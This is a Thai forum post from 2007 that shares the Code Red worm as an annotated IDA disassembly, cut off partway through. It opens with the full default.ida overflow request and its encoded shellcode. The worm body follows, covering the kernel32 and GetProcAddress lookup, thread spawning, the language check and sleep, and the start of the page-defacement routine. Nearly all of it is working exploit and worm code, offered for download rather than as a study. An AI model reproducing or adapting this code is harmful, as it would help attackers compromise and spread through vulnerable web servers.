แจก Code Red Worm

**mikeppm2** · 15-06-2007, 09:30 PM

Copyลง ไฟล์ save ลง.txt

[hide=10]seg000:00000000 seg000 segment byte public 'CODE' use32
seg000:00000000 assume cs:seg000
seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:00000000 47 45 54 20 2F 64+aGetDefault_ida db 'GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'
seg000:00000000 65 66 61 75 6C 74+ db 'NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'
seg000:00000000 2E 69 64 61 3F 4E+ db 'NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'N%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u685'
seg000:00000000 4E 4E 4E 4E 4E 4E+ db '8%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53f'
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'f%u0078%u0000%u00=a HTTP/1.0',0Dh,0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'Content-type: text/xml',0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'HOST:www.worm.com',0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db ' Accept: */*',0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'Content-length: 3569 ',0Dh,0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 0Dh,0Ah
seg000:000001D6
seg000:000001D6 ; �� S U B R O U T I N E ��
seg000:000001D6
seg000:000001D6 ; this is the worm body. this is the code that actually does the work
seg000:000001D6 ; Attributes: bp-based frame
seg000:000001D6
seg000:000001D6 WORM proc near
seg000:000001D6
seg000:000001D6 var_218 = byte ptr -218h
seg000:000001D6 var_190 = dword ptr -190h
seg000:000001D6
seg000:000001D6 55 push ebp
seg000:000001D7 8B EC mov ebp, esp ; switch esp to ebp
seg000:000001D9 81 EC 18 02 00 00 sub esp, 218h ; set up space for local variables
seg000:000001DF 53 push ebx ; save a few regs
seg000:000001E0 56 push esi
seg000:000001E1 57 push edi
seg000:000001E2 8D BD E8 FD FF FF lea edi, [ebp+var_218] ; fill in stack vars with 0xcc
seg000:000001E8 B9 86 00 00 00 mov ecx, 86h ; '�'
seg000:000001ED B8 CC CC CC CC mov eax, 0CCCCCCCCh
seg000:000001F2 F3 AB repe stosd ; Store String
seg000:000001F4 C7 85 70 FE FF FF+ mov [ebp+var_190], 0 ; set 190h to 0
seg000:000001F4 00 00 00 00 ; this zeros out the memory that holds the GetProcAddress Call.
seg000:000001FE E9 0A 0B 00 00 jmp WORMCONTINUE ; Jump
seg000:000001FE WORM endp
seg000:000001FE
seg000:00000203
seg000:00000203 ; �� S U B R O U T I N E ��
seg000:00000203
seg000:00000203
seg000:00000203 DataSetup proc near ; CODE XREF: seg000:00000D0D p
seg000:00000203 8F 85 68 FE FF FF pop dword ptr [ebp-198h]
seg000:00000209 8D BD F0 FE FF FF lea edi, [ebp-110h] ; set ebp -198h to address of the data segment
seg000:00000209 ; set edi to ebp -110
seg000:0000020F 64 A1 00 00 00 00 mov eax, large fs:0 ; set eax to an ebp+val
seg000:00000215 89 47 08 mov [edi+8], eax ; set ebp+118 to 0
seg000:00000218 64 89 3D 00 00 00+ mov large fs:0, edi ; set fs reg ?
seg000:0000021F E9 6F 0A 00 00 jmp JUMP_TABLE1 ; Jump
seg000:0000021F DataSetup endp
seg000:0000021F
seg000:00000224
seg000:00000224 ; �� S U B R O U T I N E ��
seg000:00000224
seg000:00000224
seg000:00000224 DO_RVA proc near ; CODE XREF: seg000:00000C93 p
seg000:00000224 8F 85 60 FE FF FF pop dword ptr [ebp-1A0h]
seg000:0000022A C7 85 F0 FE FF FF+ mov dword ptr [ebp-110h], 0FFFFFFFFh ; set 110h to 0xffffffff
seg000:00000234 8B 85 68 FE FF FF mov eax, [ebp-198h] ; load eax to the data address
seg000:0000023A 83 E8 07 sub eax, 7 ; sub 7 from the data segment, putting you at: oD0B
seg000:0000023D 89 85 F4 FE FF FF mov [ebp-10Ch], eax ; set ebp - 10c to oD0B
seg000:00000243 C7 85 58 FE FF FF+ mov dword ptr [ebp-1A8h], 77E00000h ; set 1a8 to 0x780000
seg000:00000243 00 00 E0 77 ; __NULL_IMPORT_DESCRIPTOR+15D4h
seg000:0000024D E8 9B 0A 00 00 call DO_REWRITE ; jump into ced, do stuff, then jump back
seg000:00000252
seg000:00000252 RVA_TOP: ; CODE XREF: DO_RVA+213 j
seg000:00000252 83 BD 70 FE FF FF+ cmp dword ptr [ebp-190h], 0 ; this is null on the first loop through, due to a null set at init.
seg000:00000252 00 ; The purpose of this loop point is to loop through DLL Names in the RVA table, looking for KERNEL32.dll, or more specificly, KERN
seg000:00000259 0F 85 DD 01 00 00 jnz GETPROC_LOADED ; go here after GetProcAddr Is loaded
seg000:0000025F 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; set ecx to 77E00000
seg000:00000265 81 C1 00 00 01 00 add ecx, 10000h ; make ecx 0x77e10000
seg000:0000026B 89 8D 58 FE FF FF mov [ebp-1A8h], ecx
seg000:00000271 81 BD 58 FE FF FF+ cmp dword ptr [ebp-1A8h], 78000000h ; is it msvcrt?
seg000:0000027B 75 0A jnz short NOT_MSVCRT ; if it is not, then jump here
seg000:0000027D C7 85 58 FE FF FF+ mov dword ptr [ebp-1A8h], 0BFF00000h
seg000:00000287
seg000:00000287 NOT_MSVCRT: ; CODE XREF: DO_RVA+57 j
seg000:00000287 8B 95 58 FE FF FF mov edx, [ebp-1A8h] ; set edx to 0x77E10000
seg000:0000028D 33 C0 xor eax, eax ; null out eax
seg000:0000028F 66 8B 02 mov ax, [edx] ; move the low half of *edx into eax
seg000:0000028F ; should be something like 5a4d
seg000:00000292 3D 4D 5A 00 00 cmp eax, 5A4Dh ; Compare Two Operands
seg000:00000297 0F 85 9A 01 00 00 jnz TO_RVA_TOP ; jump if eax is not 5a4d
seg000:0000029D 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; set ecx to 0x77E10000
seg000:000002A3 8B 51 3C mov edx, [ecx+3Ch] ; set edx to *ecx+3ch
seg000:000002A3 ; should be something like 0x000000D8
seg000:000002A6 8B 85 58 FE FF FF mov eax, [ebp-1A8h] ; set eax to 0x77E10000
seg000:000002AC 33 C9 xor ecx, ecx ; null out ecx
seg000:000002AE 66 8B 0C 10 mov cx, [eax+edx] ; set ecx to what is at eax+edx
seg000:000002AE ; should be something like 0x00004550
seg000:000002B2 81 F9 50 45 00 00 cmp ecx, 4550h ; Compare Two Operands
seg000:000002B8 0F 85 79 01 00 00 jnz TO_RVA_TOP ; jump if ecx is not 0x00004550
seg000:000002BE 8B 95 58 FE FF FF mov edx, [ebp-1A8h] ; set edx to 0x77E10000
seg000:000002C4 8B 42 3C mov eax, [edx+3Ch] ; set eax to what's at 0x77E1003Ch
seg000:000002C4 ; should be something like 0x000000D8
seg000:000002C7 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; set ecx to 0x77E10000
seg000:000002CD 8B 54 01 78 mov edx, [ecx+eax+78h] ; set edx to what's at address 0x77E100B4
seg000:000002CD ; should be somehing like 51E00
seg000:000002D1 03 95 58 FE FF FF add edx, [ebp-1A8h] ; add 0x77E10000 to edx
seg000:000002D7 89 95 54 FE FF FF mov [ebp-1ACh], edx ; set ebp-1AC to 0x77E61E00
seg000:000002DD 8B 85 54 FE FF FF mov eax, [ebp-1ACh] ; set eax to 0x77E61E00
seg000:000002E3 8B 48 0C mov ecx, [eax+0Ch] ; set ecx to what is at 0x77E61E0C
seg000:000002E3 ; should be something like 0x005394E
seg000:000002E6 03 8D 58 FE FF FF add ecx, [ebp-1A8h] ; add 0x77E10000 to ecx, to get something like 0x77E6394e
seg000:000002EC 89 8D 4C FE FF FF mov [ebp-1B4h], ecx ; set ebp-1B4 to 77E6394E
seg000:000002F2 8B 95 4C FE FF FF mov edx, [ebp-1B4h] ; set edx to 77E6394E
seg000:000002F8 81 3A 4B 45 52 4E cmp dword ptr [edx], 4E52454Bh ; looking for our specific code (NREK) - KERN spelled backwards.. this is to find KERNEL32
seg000:000002FE 0F 85 33 01 00 00 jnz TO_RVA_TOP ; Jump if Not Zero (ZF=0)
seg000:00000304 8B 85 4C FE FF FF mov eax, [ebp-1B4h]
seg000:0000030A 81 78 04 45 4C 33+ cmp dword ptr [eax+4], 32334C45h ; looking for our specific code (23LE) - EL32 spelled backwards.. this is to find KERNEL32
seg000:00000311 0F 85 20 01 00 00 jnz TO_RVA_TOP ; Jump if Not Zero (ZF=0)
seg000:00000317 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; ok, we have kernel32, now get the functions we need.
seg000:0000031D 89 8D 34 FE FF FF mov [ebp-1CCh], ecx ; store the kernel32 base addr.
seg000:00000323 8B 95 54 FE FF FF mov edx, [ebp-1ACh] ; set edx to the offset from the base
seg000:00000329 8B 85 58 FE FF FF mov eax, [ebp-1A8h] ; set eax to the base
seg000:0000032F 03 42 20 add eax, [edx+20h] ; add the offset pointer to the base to get the RVA addr.
seg000:00000332 89 85 4C FE FF FF mov [ebp-1B4h], eax ; set ebp-1b4 with rva holder
seg000:00000338 C7 85 48 FE FF FF+ mov dword ptr [ebp-1B8h], 0 ; set ebp-1b8 to 0
seg000:00000342 EB 1E jmp short RVA_PROCESS_FUNC ; This is the part of the inner RVA loop that compares the current RVA function to GetProcAddr.
seg000:00000342 ;
seg000:00000344 ; ��
seg000:00000344
seg000:00000344 RVA_INNER_TOP: ; CODE XREF: DO_RVA+20E j
seg000:00000344 8B 8D 48 FE FF FF mov ecx, [ebp-1B8h] ; this moves on to the next func in an rva table
seg000:0000034A 83 C1 01 add ecx, 1 ; Add
seg000:0000034D 89 8D 48 FE FF FF mov [ebp-1B8h], ecx
seg000:00000353 8B 95 4C FE FF FF mov edx, [ebp-1B4h]
seg000:00000359 83 C2 04 add edx, 4 ; Add
seg000:0000035C 89 95 4C FE FF FF mov [ebp-1B4h], edx
seg000:00000362
seg000:00000362 RVA_PROCESS_FUNC: ; CODE XREF: DO_RVA+11E j
seg000:00000362 8B 85 54 FE FF FF mov eax, [ebp-1ACh] ; This is the part of the inner RVA loop that compares the current RVA function to GetProcAddr.
seg000:00000362 ;
seg000:00000368 8B 8D 48 FE FF FF mov ecx, [ebp-1B8h]
seg000:0000036E 3B 48 18 cmp ecx, [eax+18h] ; Compare Two Operands
seg000:00000371 0F 8D C0 00 00 00 jge TO_RVA_TOP ; this is the end of the inside loop(there are no more functions), goto RVA top and try again.
seg000:00000377 8B 95 4C FE FF FF mov edx, [ebp-1B4h]
seg000:0000037D 8B 02 mov eax, [edx]
seg000:0000037F 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h]
seg000:00000385 81 3C 01 47 65 74+ cmp dword ptr [ecx+eax], 50746547h ; looking for GetProcAddr (PteG cmp)
seg000:0000038C 0F 85 A0 00 00 00 jnz TO_RVA_INNER_TOP ; didn't match, try the next one.
seg000:00000392 8B 95 4C FE FF FF mov edx, [ebp-1B4h]
seg000:00000398 8B 02 mov eax, [edx]
seg000:0000039A 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h]
seg000:000003A0 81 7C 01 04 72 6F+ cmp dword ptr [ecx+eax+4], 41636F72h ; looking for GetProcAddr (Acor cmp)
seg000:000003A8 0F 85 84 00 00 00 jnz TO_RVA_INNER_TOP ; didn't match, try the next one.
seg000:000003AE 8B 95 48 FE FF FF mov edx, [ebp-1B8h] ; it did match this is GetPRocAddr, need to get the mapped RVA for this func.
seg000:000003B4 03 95 48 FE FF FF add edx, [ebp-1B8h] ; get offset into table and double it
seg000:000003BA 03 95 58 FE FF FF add edx, [ebp-1A8h] ; get RVA Base for Kernel32.dll
seg000:000003C0 8B 85 54 FE FF FF mov eax, [ebp-1ACh]
seg000:000003C6 8B 48 24 mov ecx, [eax+24h]
seg000:000003C9 33 C0 xor eax, eax ; NULL out eax
seg000:000003CB 66 8B 04 0A mov ax, [edx+ecx]
seg000:000003CF 89 85 4C FE FF FF mov [ebp-1B4h], eax ; set ebp-1B4 to offset into rva table
seg000:000003D5 8B 8D 54 FE FF FF mov ecx, [ebp-1ACh]
seg000:000003DB 8B 51 10 mov edx, [ecx+10h]
seg000:000003DE 8B 85 4C FE FF FF mov eax, [ebp-1B4h]
seg000:000003E4 8D 4C 10 FF lea ecx, [eax+edx-1] ; Load Effective Address
seg000:000003E8 89 8D 4C FE FF FF mov [ebp-1B4h], ecx
seg000:000003EE 8B 95 4C FE FF FF mov edx, [ebp-1B4h]
seg000:000003F4 03 95 4C FE FF FF add edx, [ebp-1B4h] ; Add
seg000:000003FA 03 95 4C FE FF FF add edx, [ebp-1B4h] ; Add
seg000:00000400 03 95 4C FE FF FF add edx, [ebp-1B4h] ; Add
seg000:00000406 03 95 58 FE FF FF add edx, [ebp-1A8h] ; Add
seg000:0000040C 8B 85 54 FE FF FF mov eax, [ebp-1ACh]
seg000:00000412 8B 48 1C mov ecx, [eax+1Ch]
seg000:00000415 8B 14 0A mov edx, [edx+ecx]
seg000:00000418 89 95 4C FE FF FF mov [ebp-1B4h], edx
seg000:0000041E 8B 85 4C FE FF FF mov eax, [ebp-1B4h]
seg000:00000424 03 85 58 FE FF FF add eax, [ebp-1A8h] ; Add
seg000:0000042A 89 85 70 FE FF FF mov [ebp-190h], eax ; set ebp-190 to GetProcAddr Address
seg000:00000430 EB 05 jmp short TO_RVA_TOP ; Jump
seg000:00000432 ; ��
seg000:00000432
seg000:00000432 TO_RVA_INNER_TOP: ; CODE XREF: DO_RVA+168 j
seg000:00000432 ; DO_RVA+184 j
seg000:00000432 E9 0D FF FF FF jmp RVA_INNER_TOP ; this moves on to the next func in an rva table
seg000:00000437 ; ��
seg000:00000437
seg000:00000437 TO_RVA_TOP: ; CODE XREF: DO_RVA+73 j
seg000:00000437 ; DO_RVA+94 j ...
seg000:00000437 E9 16 FE FF FF jmp RVA_TOP ; this is null on the first loop through, due to a null set at init.
seg000:00000437 ; The purpose of this loop point is to loop through DLL Names in the RVA table, looking for KERNEL32.dll, or more specificly, KERN
seg000:0000043C ; ��
seg000:0000043C
seg000:0000043C GETPROC_LOADED: ; CODE XREF: DO_RVA+35 j
seg000:0000043C 8D BD F0 FE FF FF lea edi, [ebp-110h] ; Load Effective Address
seg000:00000442 8B 47 08 mov eax, [edi+8]
seg000:00000445 64 A3 00 00 00 00 mov large fs:0, eax
seg000:0000044B 83 BD 70 FE FF FF+ cmp dword ptr [ebp-190h], 0 ; see if getprocaddr is loaded
seg000:00000452 75 05 jnz short GPLOADED2 ; if it is, goto gploaded2
seg000:00000454 E9 38 08 00 00 jmp TIGHT_LOOP ; else, goto locC91
seg000:00000459 ; ��
seg000:00000459
seg000:00000459 GPLOADED2: ; CODE XREF: DO_RVA+22E j
seg000:00000459 C7 85 4C FE FF FF+ mov dword ptr [ebp-1B4h], 1 ; set ebp-1b4 to 1
seg000:00000463 EB 0F jmp short GETPROC_LOOP_TOP ; load edx with the data segment
seg000:00000465 ; ��
seg000:00000465
seg000:00000465 GETPROC_LOOP_INC: ; CODE XREF: DO_RVA+2E9 j
seg000:00000465 8B 8D 4C FE FF FF mov ecx, [ebp-1B4h] ; increment the counter at ebp-ib4
seg000:0000046B 83 C1 01 add ecx, 1 ; Add
seg000:0000046E 89 8D 4C FE FF FF mov [ebp-1B4h], ecx
seg000:00000474
seg000:00000474 GETPROC_LOOP_TOP: ; CODE XREF: DO_RVA+23F j
seg000:00000474 8B 95 68 FE FF FF mov edx, [ebp-198h] ; load edx with the data segment
seg000:0000047A 0F BE 02 movsx eax, byte ptr [edx] ; move the byte at data segment to eax
seg000:0000047D 85 C0 test eax, eax ; check if the byte is null. This signifies the end of the function data section.
seg000:0000047F 0F 84 8D 00 00 00 jz FUNC_LOAD_DONE ; if it is, go here
seg000:00000485 8B 8D 68 FE FF FF mov ecx, [ebp-198h] ; load ecx with the data segment
seg000:0000048B 0F BE 11 movsx edx, byte ptr [ecx] ; load edx wuith the byte at data segment
seg000:0000048E 83 FA 09 cmp edx, 9 ; check if the byte specifies change of dll
seg000:00000491 75 21 jnz short loc_4B4 ; if not, jump here
seg000:00000493 8B 85 68 FE FF FF mov eax, [ebp-198h] ; set eax to current data pointer
seg000:00000499 83 C0 01 add eax, 1 ; get past the 9
seg000:0000049C 8B F4 mov esi, esp
seg000:0000049E 50 push eax ; push current data pointer
seg000:0000049F FF 95 90 FE FF FF call dword ptr [ebp-170h] ; LoadLibraryA
seg000:000004A5 3B F4 cmp esi, esp ; Compare Two Operands
seg000:000004A7 90 nop ; No Operation
seg000:000004A8 43 inc ebx ; Increment by 1
seg000:000004A9 4B dec ebx ; Decrement by 1
seg000:000004AA 43 inc ebx ; Increment by 1
seg000:000004AB 4B dec ebx ; Decrement by 1
seg000:000004AC 89 85 34 FE FF FF mov [ebp-1CCh], eax ; load current dll base pointer with return from LoadLibraryA
seg000:000004B2 EB 2A jmp short DLL_CHECK_NULL_BRANCH ; Jump
seg000:000004B4 ; ��
seg000:000004B4
seg000:000004B4 loc_4B4: ; CODE XREF: DO_RVA+26D j
seg000:000004B4 8B F4 mov esi, esp
seg000:000004B6 8B 8D 68 FE FF FF mov ecx, [ebp-198h] ; set ecx with the data segment pointer
seg000:000004BC 51 push ecx ; push data segment(pointer of function to load)
seg000:000004BD 8B 95 34 FE FF FF mov edx, [ebp-1CCh] ; get current RVA base offset
seg000:000004C3 52 push edx ; push module handle(base loaded address)
seg000:000004C4 FF 95 70 FE FF FF call dword ptr [ebp-190h] ; call GetProcAddress
seg000:000004CA 3B F4 cmp esi, esp ; Compare Two Operands
seg000:000004CC 90 nop ; No Operation
seg000:000004CD 43 inc ebx ; Increment by 1
seg000:000004CE 4B dec ebx ; Decrement by 1
seg000:000004CF 43 inc ebx ; Increment by 1
seg000:000004D0 4B dec ebx ; Decrement by 1
seg000:000004D1 8B 8D 4C FE FF FF mov ecx, [ebp-1B4h] ; load ecx with ebp-1b4
seg000:000004D7 89 84 8D 8C FE FF+ mov [ebp+ecx*4-174h], eax ; load the address into the ebp stack where needed
seg000:000004D7 FF ; this sets up our function jumptable
seg000:000004DE
seg000:000004DE DLL_CHECK_NULL_BRANCH: ; CODE XREF: DO_RVA+28E j
seg000:000004DE EB 0F jmp short CHECK_NULL_BRANCH ; load eax with data segment.
seg000:000004DE ;
seg000:000004DE ; this checks the nullishness of the ebp-198 data pointer, and if isn't null, increments it.
seg000:000004E0 ; ��
seg000:000004E0
seg000:000004E0 CHECK_NULL_BRANCH_INC: ; CODE XREF: DO_RVA+2D8 j
seg000:000004E0 8B 95 68 FE FF FF mov edx, [ebp-198h] ; this function moves the data segment on to the next lookup
seg000:000004E6 83 C2 01 add edx, 1 ; Add
seg000:000004E9 89 95 68 FE FF FF mov [ebp-198h], edx
seg000:000004EF
seg000:000004EF CHECK_NULL_BRANCH: ; CODE XREF: DO_RVA+2BA j
seg000:000004EF 8B 85 68 FE FF FF mov eax, [ebp-198h] ; load eax with data segment.
seg000:000004EF ;
seg000:000004EF ; this checks the nullishness of the ebp-198 data pointer, and if isn't null, increments it.
seg000:000004F5 0F BE 08 movsx ecx, byte ptr [eax] ; load byte at eax into ecx
seg000:000004F8 85 C9 test ecx, ecx ; check for null
seg000:000004FA 74 02 jz short GETPROC_SHIFT_NULL ; if it is null, go here
seg000:000004FC EB E2 jmp short CHECK_NULL_BRANCH_INC ; else go here
seg000:000004FE ; ��
seg000:000004FE
seg000:000004FE GETPROC_SHIFT_NULL: ; CODE XREF: DO_RVA+2D6 j
seg000:000004FE 8B 95 68 FE FF FF mov edx, [ebp-198h] ; this function moves past the null on the end of a line to set the function up for the next run through the getproc/load library system
seg000:00000504 83 C2 01 add edx, 1 ; Add
seg000:00000507 89 95 68 FE FF FF mov [ebp-198h], edx
seg000:0000050D E9 53 FF FF FF jmp GETPROC_LOOP_INC ; increment the counter at ebp-ib4
seg000:00000512 ; ��
seg000:00000512
seg000:00000512 FUNC_LOAD_DONE: ; CODE XREF: DO_RVA+25B j
seg000:00000512 8B 85 68 FE FF FF mov eax, [ebp-198h] ; set eax to the data segment
seg000:00000518 83 C0 01 add eax, 1 ; inc eax
seg000:0000051B 89 85 68 FE FF FF mov [ebp-198h], eax ; set datasegment to eax
seg000:0000051B ;
seg000:0000051B ; This moves us past the final NULL at the end of the Dll Listing
seg000:00000521 8B 4D 08 mov ecx, [ebp+8] ; load ecx with an address at ebp+8
seg000:00000524 8B 91 84 00 00 00 mov edx, [ecx+84h] ; load edx with a wam.dll entry
seg000:0000052A 89 95 6C FE FF FF mov [ebp-194h], edx ; load this wam.dll entry into ebp-194
seg000:00000530 C7 85 4C FE FF FF+ mov dword ptr [ebp-1B4h], 4 ; set ebp-1b4 to 4
seg000:0000053A C6 85 D0 FE FF FF+ mov byte ptr [ebp-130h], 68h ; 'h' ; set ebp-130 to 68h
seg000:0000053A 68 ;
seg000:0000053A ; this seems to be setting up some type of structure
seg000:00000541 8B 45 08 mov eax, [ebp+8] ; load eax with ebp+8(possibly an isapi request struct)
seg000:00000544 89 85 D1 FE FF FF mov [ebp-12Fh], eax ; save the ebp+8 at ebp-12f
seg000:0000054A C7 85 D5 FE FF FF+ mov dword ptr [ebp-12Bh], 0FF53535Bh
seg000:00000554 C7 85 D9 FE FF FF+ mov dword ptr [ebp-127h], 90907863h
seg000:0000055E 8B 4D 08 mov ecx, [ebp+8] ; check pointer to the possible isapi struct
seg000:00000561 8B 51 10 mov edx, [ecx+10h]
seg000:00000564 89 95 50 FE FF FF mov [ebp-1B0h], edx ; set response to check at ebp-1b0
seg000:0000056A 83 BD 50 FE FF FF+ cmp dword ptr [ebp-1B0h], 0 ; Compare Two Operands
seg000:00000571 75 26 jnz short loc_599 ; if it's not 0, then go here
seg000:00000573 8B F4 mov esi, esp ; Get Ready to call a function
seg000:00000575 6A 00 push 0 ; push a null
seg000:00000577 8D 85 4C FE FF FF lea eax, [ebp-1B4h] ; load eax to the addr of ebp-1b4, set to 4
seg000:0000057D 50 push eax ; push the addr on the stack
seg000:0000057E 8B 8D 68 FE FF FF mov ecx, [ebp-198h] ; load eax to the addr of ebp-198, set to data segment right after the funcnames
seg000:00000584 51 push ecx ; push it
seg000:00000585 8B 55 08 mov edx, [ebp+8] ; set edx with ebp+8 pointer
seg000:00000588 8B 42 08 mov eax, [edx+8] ; load eax with the data at edx+8
seg000:0000058B 50 push eax ; push eax
seg000:0000058C FF 95 6C FE FF FF call dword ptr [ebp-194h] ; call WriteClient in WAM
seg000:00000592 3B F4 cmp esi, esp ; Compare Two Operands
seg000:00000594 90 nop ; No Operation
seg000:00000595 43 inc ebx ; Increment by 1
seg000:00000596 4B dec ebx ; Decrement by 1
seg000:00000597 43 inc ebx ; Increment by 1
seg000:00000598 4B dec ebx ; Decrement by 1
seg000:00000599
seg000:00000599 loc_599: ; CODE XREF: DO_RVA+34D j
seg000:00000599 83 BD 50 FE FF FF+ cmp dword ptr [ebp-1B0h], 64h ; 'd' ; check is 64 is in ebp-1b0
seg000:000005A0 7D 5C jge short TOO_MANY_THREADS ; branch here if more than 100 are running
seg000:000005A2 8B 8D 50 FE FF FF mov ecx, [ebp-1B0h] ; set ecx to number of threads
seg000:000005A8 83 C1 01 add ecx, 1 ; increment the number of open threads
seg000:000005AB 89 8D 50 FE FF FF mov [ebp-1B0h], ecx ; store the new value of threadcount
seg000:000005B1 8B 95 50 FE FF FF mov edx, [ebp-1B0h] ; set thread count into edx
seg000:000005B7 69 D2 8D 66 F0 50 imul edx, 50F0668Dh ; Signed Multiply
seg000:000005BD 89 95 74 FE FF FF mov [ebp-18Ch], edx ; store the new val at ebp-18c
seg000:000005C3 8B 45 08 mov eax, [ebp+8] ; load eax with the isapi extension block
seg000:000005C6 8B 8D 50 FE FF FF mov ecx, [ebp-1B0h] ; load ecx with the threadcount
seg000:000005CC 89 48 10 mov [eax+10h], ecx ; store threadcount in the isapi extension block
seg000:000005CF 8B F4 mov esi, esp
seg000:000005D1 8D 95 2C FE FF FF lea edx, [ebp-1D4h] ; Load Effective Address
seg000:000005D7 52 push edx ; LPDWORD lpThreadId // thread identifier
seg000:000005D8 6A 00 push 0 ; DWORD dwCreationFlags // creation option
seg000:000005DA 8D 85 4C FE FF FF lea eax, [ebp-1B4h] ; Load Effective Address
seg000:000005E0 50 push eax ; LPVOID lpParameter // thread argument
seg000:000005E1 8D 8D D0 FE FF FF lea ecx, [ebp-130h] ; Load Effective Address
seg000:000005E7 51 push ecx ; LPTHREAD_START_ROUTINE lpStartAddress // thread function
seg000:000005E8 6A 00 push 0 ; DWORD dwStackSize // initial stack size
seg000:000005EA 6A 00 push 0 ; LPSECURITY_ATTRIBUTES lpThreadAttributes // SD
seg000:000005EC FF 95 98 FE FF FF call dword ptr [ebp-168h] ; CreateThread
seg000:000005F2 3B F4 cmp esi, esp ; Compare Two Operands
seg000:000005F4 90 nop ; No Operation
seg000:000005F5 43 inc ebx ; Increment by 1
seg000:000005F6 4B dec ebx ; Decrement by 1
seg000:000005F7 43 inc ebx ; Increment by 1
seg000:000005F8 4B dec ebx ; Decrement by 1
seg000:000005F9 E9 9F 01 00 00 jmp DO_THE_WORK ; this exits from sub 224, not positive of the end result.
seg000:000005FE ; ��
seg000:000005FE
seg000:000005FE TOO_MANY_THREADS: ; CODE XREF: DO_RVA+37C j
seg000:000005FE 8B F4 mov esi, esp ; setup a func
seg000:00000600 FF 95 A4 FE FF FF call dword ptr [ebp-15Ch] ; GetSystemDefaultLangId
seg000:00000606 3B F4 cmp esi, esp ; Compare Two Operands
seg000:00000608 90 nop ; No Operation
seg000:00000609 43 inc ebx ; Increment by 1
seg000:0000060A 4B dec ebx ; Decrement by 1
seg000:0000060B 43 inc ebx ; Increment by 1
seg000:0000060C 4B dec ebx ; Decrement by 1
seg000:0000060D 89 85 4C FE FF FF mov [ebp-1B4h], eax ; put default system languageid in ebp-1b4
seg000:00000613 8B 95 4C FE FF FF mov edx, [ebp-1B4h]
seg000:00000619 81 E2 FF FF 00 00 and edx, 0FFFFh ; Logical AND
seg000:0000061F 89 95 4C FE FF FF mov [ebp-1B4h], edx
seg000:00000625 81 BD 4C FE FF FF+ cmp dword ptr [ebp-1B4h], 409h ; Compare Two Operands
seg000:0000062F 74 05 jz short IS_AMERICAN ; if not english go
seg000:00000631 E9 67 01 00 00 jmp DO_THE_WORK ; this exits from sub 224, not positive of the end result.
seg000:00000636 ; ��
seg000:00000636
seg000:00000636 IS_AMERICAN: ; CODE XREF: DO_RVA+40B j
seg000:00000636 8B F4 mov esi, esp
seg000:00000638 68 00 DD 6D 00 push 6DDD00h ; this is 2 hours
seg000:0000063D FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep
seg000:0000063D ;
seg000:0000063D ; This Sleeps for 2 hours
seg000:00000643 3B F4 cmp esi, esp ; Compare Two Operands
seg000:00000645 90 nop ; No Operation
seg000:00000646 43 inc ebx ; Increment by 1
seg000:00000647 4B dec ebx ; Decrement by 1
seg000:00000648 43 inc ebx ; Increment by 1
seg000:00000649 4B dec ebx ; Decrement by 1
seg000:0000064A E9 80 06 00 00 jmp HACK_PAGE_JUMP ; this sets up the hacked page bit
seg000:0000064A DO_RVA endp
seg000:0000064A
seg000:0000064F
seg000:0000064F ; �� S U B R O U T I N E ��
seg000:0000064F
seg000:0000064F ; pop the stack into the counter
seg000:0000064F
seg000:0000064F HACK_PAGE proc near ; CODE XREF: seg000:00000CCF p
seg000:0000064F 8F 85 4C FE FF FF pop dword ptr [ebp-1B4h]
seg000:00000655 8B 85 34 FE FF FF mov eax, [ebp-1CCh] ; load eax with the current dll base address(probably w3svc)
seg000:0000065B 89 85 CC FE FF FF mov [ebp-134h], eax ; store base at ebp-134
seg000:00000661 8B 8D 4C FE FF FF mov ecx, [ebp-1B4h] ; load thecounter into ecx
seg000:00000667 8B 95 B0 FE FF FF mov edx, [ebp-150h] ; load edx with tcpsocksend
seg000:0000066D 89 11 mov [ecx], edx ; store tcpsocksend at the address popped from the stack
seg000:0000066F 8B 85 4C FE FF FF mov eax, [ebp-1B4h] ; load eax with the address popped from the stack
seg000:00000675 8B 8D C8 FE FF FF mov ecx, [ebp-138h] ; load ecx with close socket
seg000:0000067B 89 48 04 mov [eax+4], ecx ; the next addr after the one popped is replaced with closesocket
seg000:0000067E 8B 95 68 FE FF FF mov edx, [ebp-198h] ; store data pointer in edx
seg000:00000684 89 95 50 FE FF FF mov [ebp-1B0h], edx ; store data pointer at ebp-1b0
seg000:0000068A EB 0F jmp short GET_HTML ; Jump
seg000:0000068C ; ��
seg000:0000068C
seg000:0000068C GET_HTML_INC: ; CODE XREF: HACK_PAGE+70 j
seg000:0000068C 8B 85 50 FE FF FF mov eax, [ebp-1B0h] ; Get the next byte to compare to
seg000:00000692 83 C0 01 add eax, 1 ; Add
seg000:00000695 89 85 50 FE FF FF mov [ebp-1B0h], eax
seg000:0000069B
seg000:0000069B GET_HTML: ; CODE XREF: HACK_PAGE+3B j
seg000:0000069B 8B 8D 68 FE FF FF mov ecx, [ebp-198h]
seg000:000006A1 81 C1 00 01 00 00 add ecx, 100h ; Add
seg000:000006A7 39 8D 50 FE FF FF cmp [ebp-1B0h], ecx ; compare shifted URL to HTML
